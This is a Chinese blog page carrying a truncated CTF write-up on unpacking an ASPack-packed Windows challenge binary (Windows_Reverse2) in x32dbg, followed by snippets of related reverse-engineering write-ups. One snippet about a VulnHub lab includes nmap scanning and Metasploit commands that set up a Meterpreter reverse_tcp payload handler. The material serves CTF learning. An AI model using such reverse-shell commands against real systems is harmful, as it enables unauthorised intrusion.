攻防世界 Windows_Reverse2

最新推荐文章于 2025-05-25 13:49:43 发布
最新推荐文章于 2025-05-25 13:49:43 发布
阅读量960 收藏 4
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 攻防世界 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53349587/article/details/123454162
本文详细讲述了如何通过逆向工程破解一个包含ASPACK壳的32位程序,逐步揭示解密算法和Base64加密步骤。关键函数decrypt解析十六进制字符,而sub_D51000执行Base64加密。最终揭示输入字符串的flag解密过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这道题其实不算难,只不过我想的有点复杂了,看来学逆向还是需要具有发散性思维的,有些问题确实想不到啊!!

查壳发现有aspack壳:

根据日常习惯,直接手动脱壳(其实是脱壳工具没找着。。),32位程序,x32dbg打开:

首先看到程序中有一个pushad指令,按照我习惯的脱壳方法,直接F8执行pushad,然后在栈中下一个硬件断点,F9运行,即可找到popad的位置

 继续往下执行,一直到地址为0x726425的ret指令执行完:

 看到一个关键的jmp指令(jmp的距离比较远,极有可能跳转过去就是OEP的位置),一直执行到jmp指令,jmp指令执行完之后:

 现在程序已经执行到OEP的位置了,dump

最低0.47元/天 解锁文章

200万优质内容无限畅学
Windows_Reverse1
Tigger.run 独立开发者 热爱逆向工程
05-19 796
目录0x0 题目涉及知识点0x1 查壳脱壳0x2 反汇编分析0x3写脚本 0x0 题目涉及知识点 简单脱壳 指针运算 位移量 字符串查询 0x1 查壳脱壳 使用 UPX 工具脱壳 0x2 反汇编分析 初步了解程序执行流程,sub_401000(&v6) 为加密过程,&v4中存放了flag。 char v4; // [esp+4h] [ebp-804h] char v5; // [esp+5h] [ebp-803h] char v6; // [esp+404h] [ebp
攻防世界REVERSE—高手进阶区—debug 相关工具的使用方法(究极新人向)
Nu1bzzi的博客
03-13 601
攻防世界REVERSE—高手进阶区—debug 相关工具使用方法(究极新人向) 在做题的时候有看过很多大佬的wp,但是真的其中有些地方没有讲到,对和我一样笨的应该有些帮助(至少不至于像我这样到处搜了半天结果最后自己悟了。大佬们看到这可以选择离开or not,对不起打扰到你们了。) ILspy ILspy是一个开源的.net反编译软件 可以将一个.dll文件转换为C#或VB语言。 对于单个文件可以保存为.cs文件或.vb文件,当文件较多时,可以选择保存为项目文件。 C#语句可被反编译出来,并可支持yield
攻防世界逆向高手题之Windows_Reverse2
沐一 · 林 的博客
09-14 813
攻防世界逆向高手题之Windows_Reverse2 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的Windows_Reverse2 . . 下载附件,照例扔入exeinfope中查看信息,发现ASPACK壳,也提示了使用ASPACK unpack脱壳工具脱壳: . . 用WASPACK脱壳工具脱壳后,运行不了,,,扔入IDA32中查看伪代码信息,有main函数看main函数: . . (这里积累第一个经验) 可以发现三个关键部分,大概是三层逻辑修改。双击跟踪sub_7F11F0()函数,内
攻防世界reverse新手模式-ereere
最新发布
2302_79735426的博客
05-25 736
先下载附件,只有一个无后缀的文件。
Windows_Reverse2 攻防世界
re1wn
04-03 1220
Windows_Reverse2 攻防世界
攻防世界Windows_Reverse2
meccke的博客
04-17 384
第一个if判断长度是否为零,如果不是零就判断字符是否在0到9或者A到F的范围内,内部操作-55:例如A的ascll码值为65,所以A到F可以转化为10到15,符合十六进制,所以函数是转十六进制。可以判断出v5,v6是数组中相邻的两个元素。在call处内存访问下硬件访问断点,f9找到popad,基本上就离oep不远了。提取byte_CD3020数组中的元素,与0x76异或可得base64原表。:这一行计算了两个字符转换后的十六进制数,并将其存储到数组。长度为二的倍数,且处于0到9,A到F之间;
Reverse2
Dicked的博客
12-11 440
EASY_RE 下载文件,用ida打开,按F5,并用r将其替换
CTF Reverse Corroded_Alien_Artifact.exe解题思路
ACGeny的博客
09-22 578
CTF Reverse Corroded Alien Artifact.exe解题思路一、文件描述二、解题思路 一、文件描述 运行程序发现直接退出; 无壳的64位程序; 静态和动态都试试的。 二、解题思路 用IDA Pro打开,找到main函数,发现sub_140014420子函数打不开, 提示不能分析,应该是遇到异常情况。 进入到sub_1400012FF中,首行提示output wrong!意思是该函数没法正常显示。ps:题主的IDA Pro是7.5版本的。 在第14行Tap到汇编窗口中,
Reverse(五):攻防世界WP--2
weixin_44122225的博客
06-06 363
1.re1: 获得re1的可执行文件,为windows下的32wei可执行程序,在cmd控制台下到达该文件所在目录,使用strings命令查看字符串信息 观察所有输出的字符串,可以轻松找到flag 2.
攻防世界 reverse 新手题wp (第二周)
清霂的博客
12-01 1386
目录re1思路game思路Hello, CTF思路 re1 题目描述:菜鸡开始学习逆向工程,首先是最简单的题目 思路 拖入ida,转伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax __int128 v5; // [esp+0h] [ebp-44h] __int64 v6; // [esp+10h] [ebp-34h] int v7; // [esp+18h] [ebp-
XCTF Windows_Reverse2
lhk124的博客
07-24 570
1.查壳,脱壳。 壳:aspack 可以手工脱壳或者用工具 1.取值范围和长度的判断(如图) 2.sub_401240:可以通过减去的值判断出:最后的值的取值范围是0-15,所以判定为转换为16进制 3.sub_401240里的sub_401000函数:base64的加解密的魔改 所以,程序的正向逻辑是: 输入,判断长度是否为偶数,是否在'0'->'9' 'A'->'F'之间 在sub_401240转换为16进制 在sub_401000里进行base64魔改加密,最终结果为...
reverse2
since_2020的博客
04-18 164
reverse2思路
BUUCTF--reverse2
weixin_30876945的博客
09-04 785
测试文件:https://buuoj.cn/files/ef0881fc76e5bcd756b554874ef99bec/e8722e94-93d7-45d5-aa06-a7aa26ce01a1.rar?token=eyJ0ZWFtX2lkIjpudWxsLCJ1c2VyX2lkIjoxOTAzLCJmaWxlX2lkIjoxNTJ9.XW-dPA.rxYLlTnLCwgbqaIazUX...
Windows_Reverse2
XFox_的博客
10-10 241
Windows_Reverse2 要求输入code 查壳工具查壳,ASPack再进行脱壳 再IDA打开查看main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char Buffer; // [esp+8h] [ebp-C04h] BYREF char v5[1023]; // [esp+9h] [ebp-C03h] BYREF char v6; // [esp+408h] [ebp-804h] B
Reverse reverse2
2301_77597567的博客
10-22 324
的提示字符串,可以看到最下面有一个形似flag的字符串 hacking_for_fun},让我们双击this is the right flag!4.进入到这个界面,根据25行的if判断可知,只有当我们输入的字符串s2跟flag字符串一一样,就会提示我们flag是正确的,单击数字49的中间按R键,可以看到49变为了1。5.可以看到方框圈住的就是这个reverse2的flag注意到19行到23行的代码,回将字符串里的i和r变化成1,所以我们的flag字符串也要变化一下。
攻防世界Reverse——re2-cpp-is-awesome writeup
2301_77295404的博客
01-10 442
这段代码的主要功能是: 把dword_6020c0数组的每个元素作为索引,查找off_6020a0字符串,得到的结果跟输入的字符串做对比。
[BUUCTF]REVERSE——reverse2
mcmuyanga的博客
10-14 3339
reverse2 附件 例行检查,64位目标 64位ida载入,首先shift+f12检索程序里的字符串 得到了“this is the right flag!” 的提示字符串,还看到了一个可能是flag的字符串,“hacking_for fun}” 双击“this is the right flag!” 的提示字符串,ctrl+x找到调用处 根据27行的if判断可知,只有当我们输入的字符串s2跟flag字符串一一样,就会提示我们flag是正确的,看一下flag字符串 hacking_for_fun
reverse2题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-27 776
buuctf-reverse2题解
攻防世界 Reverse
qq_41071646的博客
04-28 876
看pwn 看不下去 没事做做逆向题 想想 后天就要回家了~~ 想想还是有点小激动 这个题 其实逻辑很简单 我们看一下 check函数 其中那个strtohex 就是把两个字符 转化成一个 16进制的数字 然后我们 写一个脚本就可以了 #include <stdio.h> #include<iostream> #include<io...
vulnhub靶机 driftingblues2
01-04
### 关于VulnHub DriftingBlues2靶机详情 #### 靶机概述 DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`版本而言,此靶机旨在模拟真实世界中的信息系统环境,并设置了多个层次的任务来挑战玩家的技术水平[^4]。 #### 渗透测试流程 ##### 信息收集阶段 在这个过程中,首要任务是从外部视角了解目标系统的开放服务及其配置情况。通常采用的方法包括但不限于: - **主机发现**:通过网络扫描工具(如Nmap)识别活动主机并确定其IP地址范围。 - **端口和服务枚举**:进一步探测已知存活节点上的可用端口以及运行的服务类型和版本号。 由于`DriftingBlues: 2`的具体内部结构未完全公开,在实际操作前需自行探索更多细节以制定后续行动计划。 ##### 漏洞利用实践 一旦完成了初步的情报搜集工作,则可以根据所获数据选择合适的攻击向量实施入侵行为。例如,如果发现了某个存在已知漏洞的应用程序实例,则可考虑运用Metasploit Framework (MSF) 或其他自动化平台来进行针对性打击。 值得注意的是,在处理此类实验性质较强的项目时,建议遵循官方指南或社区分享的经验贴作为参考依据,以便更高效地完成整个过程[^5]。 ```bash # 使用Nmap进行基本的TCP SYN扫描 nmap -sS <target_ip> # 利用Metasploit加载exploit模块 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_local_IP> run ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值